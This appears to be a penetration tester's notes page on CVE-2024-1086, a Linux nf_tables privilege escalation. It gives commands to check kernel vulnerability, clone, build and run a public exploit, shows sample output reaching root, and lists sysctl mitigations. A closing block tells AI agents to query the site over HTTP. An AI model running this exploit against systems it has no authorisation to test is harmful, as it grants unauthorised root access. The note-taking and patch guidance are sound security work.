# nf\_tables - CVE-2024-1086
{% hint style="danger" %}
```
Warning:
This exploit is very volatile and more often than not freezes the target.
I would not recommend trying this in production in it's current state.
```
{% endhint %}
A short Proof-of-Concept of **privilege escalation** exploit CVE-2024-1086 (`nf_tables`), working on most Linux kernels between version 5.14 - 6.6, including Debian, Ubuntu and KernelCTF. The exploit is very unstable, **use with caution**.
Verify kernel version:
```sh
kali-test :: ~ » uname -r
6.3.0-kali1-amd64
```
Verify that unprivileged users can create namespaces:
```sh
kali-test :: ~ » sysctl kernel.unprivileged_userns_clone && sysctl user.max_user_namespaces
kernel.unprivileged_userns_clone = 1
user.max_user_namespaces = 31303
kali-test :: ~ » grep -E 'CONFIG_USER_NS|CONFIG_INIT_ON_ALLOC_DEFAULT_ON' /boot/config-$(uname -r)
CONFIG_USER_NS=y
CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y
```
Verify if kernel version is vulnerable to CVE-2024-1086, according to table below. \
**Note**: Exploit will work up to (including) version 6.6.4 if `CONFIG_INIT_ON_ALLOC_DEFAULT_ON` is toggled off.
| Kernel Version | Working/Fail | Fail Reason |
| -------------- | ------------ | -------------------------------------------------------------------------------------------- |
| v5.4.270 | fail | \[CODE] pre-dated nft code (denies rule alloc) |
| v5.10.209 | fail | \[TCHNQ] BUG mm/slub.c:4118 |
| v5.14.21 | working | n/a |
| v5.15.148 | working | n/a |
| v5.16.20 | working | n/a |
| v5.17.15 | working | n/a |
| v5.18.19 | working | n/a |
| v5.19.17 | working | n/a |
| v6.0.19 | working | n/a |
| v6.1.55 | working | n/a |
| v6.1.69 | working | n/a |
| v6.1.69 | working | n/a |
| v6.1.72 | working | n/a |
| v6.2.? | working | n/a |
| v6.2.16 | working | n/a |
| v6.3.13 | working | n/a |
| v6.4.16 | fail | \[TCHNQ] bad page: page->\_mapcount != -1 (-513), bcs CONFIG\_INIT\_ON\_ALLOC\_DEFAULT\_ON=y |
| v6.5.3 | fail | \[TCHNQ] bad page: page->\_mapcount != -1 (-513), bcs CONFIG\_INIT\_ON\_ALLOC\_DEFAULT\_ON=y |
| v6.5.13 | fail | \[TCHNQ] bad page: page->\_mapcount != -1 (-513), bcs CONFIG\_INIT\_ON\_ALLOC\_DEFAULT\_ON=y |
| v6.6.14 | fail | \[TCHNQ] bad page: page->\_mapcount != -1 (-513), bcs CONFIG\_INIT\_ON\_ALLOC\_DEFAULT\_ON=y |
| v6.7.1 | fail | \[CODE] nft verdict value incorrect is altered by kernel |
Download, install and build exploit.
```sh
kali-test :: ~ » git clone https://github.com/Notselwyn/CVE-2024-1086
kali-test :: ~ » sudo apt install musl-tools
kali-test :: ~ » cd CVE-2024-1086
kali-test :: ~/CVE-2024-1086 ‹main› » make
```
Run exploit.
```sh
kali-test :: ~/CVE-2024-1086 ‹main› » ./exploit
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[... snip ...]
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -r
6.3.0-kali1-amd64
```
***
## Patch
To patch the vulnerability simply upgrade the kernel to a non-vulnerable version.
If you're not able to upgrade the kernel for some reason, you can **temporarily** fix the issue by denying unprivileged users to create namespaces:\
`sudo sysctl -w kernel.unprivileged_userns_clone=0`
Or **permanently** by:\
`echo kernel.unprivileged_userns_clone=0 | \ sudo tee /etc/sysctl.d/99-disable-unpriv-userns.conf`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/nf_tables-cve-2024-1086.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.